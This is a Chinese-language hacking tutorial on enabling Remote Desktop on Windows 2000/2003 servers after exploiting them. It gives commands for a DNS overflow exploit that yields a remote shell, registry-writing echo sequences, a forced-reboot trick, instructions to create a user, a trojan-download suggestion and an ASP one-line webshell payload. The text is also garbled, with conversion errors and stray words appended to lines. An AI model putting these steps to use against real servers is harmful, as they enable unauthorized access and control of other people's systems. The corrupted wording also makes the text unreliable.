开启和关闭远程Windows系统3389端口

 

一、Win七、Win200三、XP系统shell

在CMD命令行开启3389端口:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /fapi

在CMD命令行关闭3389端口(将00000000改为11111111便可):服务器

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /ftcp

二、2000系统 工具

简要说一下如何进行DNS溢出攻击。我用的溢出利用程序是dns.exe,在CMD下运行它能够看到它的使用参数等信息。执行"dns -s IP"命令检测目标IP是否存在DNS溢出漏洞,若存在则进行溢出攻击,执行"dns -t 2000all IP 1207"后提示要咱们检测返回的1100端口的shell。"telnet IP 1100"成功获得返回的cmdshell。注意目录为c:/WINNT/system32,接着咱们须要作的是使用"echo"命令写入一个3389.reg注册表文件。将以下代码一行一行地复制到cmdshell窗口后按回 车执行:网站

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg操作系统

简单说明一下,">"符号是覆盖写入文件,如无此文件则建立,有则覆盖原来的内容写入。">>"是追加写入,即在原有文件内容的基础上在 后面写入内容。这里是写入内容到3389.reg文件中!须要注意的是第二行,那个做用是写入一行空格,由于.reg文件的格式 必须如此!成功写入完毕后接着执行导入操做,执行"regedit /s 3389.reg"。这样注册表文件就已经顺利导入到注册表里去了。不过须要注意的是在cmdshell下不要输错任何一个字符,不然将没法执行,建议先 本身打好在记事本上,确保无误以后再复制到cmdshell窗口执行。而后能够用下面这个方法重启目标主机。在cmdshell下执行以下代码:命令行

@ECHO OFF & cd/d %temp% & echo [version] > {out}.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> {out}.inf
echo [defaultinstall] >> {out}.inf
rundll32 setupapi,%inf% 1 %temp%/{out}.inf r3d

按顺序将以上五行代码一行一行地复制到cmdshell上,复制完一行按一次回车执行,五行都执行完毕后,服务器就会重启的了。固然让服务器重启的方法比较多,好比结束掉系统关键进程、代码模拟按键等都是能够的,如无心外,等待服 务器完成重启以后再链接目标发现远程桌面服务已经成功开启了。至此Windows 2000操做系统溢出后返回的cmdshell下开启远程桌面服务就成功完成了。dns

三、2003系统

相对于2000的系 统来讲,2003cmdshell下开启远程桌面服务就比较容易一些了,起码无需重启嘛!第一种方法也是用"echo"命令写入一个 3389.reg文件,再"regedit /s 3389.reg"导入注册表文件便可开启,比较简单,与上面介绍的2000的开启方法相似。将以下代码一行一行地复制到cmdshell窗口后按回车执 行:

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg

完成以上操做后再执行"regedit /s 3389.reg"导入便可生效!不过这个方法相对来讲比较麻烦。咱们还能够用另一种比较简单的方法来开启远程桌面服务的。在介绍另外一个操做方法以前,咱们先来熟悉下2003系统下远程桌面服务的一个最关键的注册表键值。
在"HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

下数值名称为"fDenyTSConnections"的这一项,能够看到它的数值数据为1或0。数值为1的时候关闭远程桌面服务,数值为0的时候开启远程 桌面服务。换句话说,咱们只要能够在cmdshell下更改这个关键的注册表键值数据就能够达到实现开启远程桌面服务的目的了!有幸的是,在2003下有 一个"reg"命令彻底能够作到这一点。这里咱们找一台操做系统为2003的服务器,经过和上面介绍的一样方法溢出后返回一个cmdshell。当咱们尝试链接的时候会发现根本没法链接上去。下面详细说明一下用"reg"命令开启远程桌面服务。执行:

reg query "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

咱们发现"fDenyTSConnections"键值数据为"0x1"。这个是十六进制数的1。上面提到,数据为1则没有开启远程桌面服务。咱们要作的就是把"0x1"改为"0x0"!直接用"reg add"是不行的,必须把原来键值删掉再添加!在cmdshell下执行:

reg delete "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections

会询问是否"要删除注册表值 fDenyTSConnections 吗",固然Yes了。再执行:

reg add "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

提示操做成功完成。这样就把"fDenyTSConnections"的值改成"0x0"了,咱们能够执行:

reg query "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

发现已经成功更改了数据。如今再来链接服务器的3389看看,发现已经能够成功链接上了,建立个用户玩玩。至此2003下cmdshell开启远程桌面服务的方法也介绍完了。

溢出后也不必定要非要在cmdshell下开启远程桌面服务。能够echo一个vbs文件,下载远程控制木马,而后在cmdshell里运行一下木马便可链接。还有就是查询目标IP是否绑定有网站,若是有则找到网站目录,再用echo个一句话木马进去(例如:echo "<%execute request("cmd")%>"   > WEB路径/test.asp),用中国年菜刀链接,而后上传大马,上传开3389的工具再开启也行。

相关文章
相关标签/搜索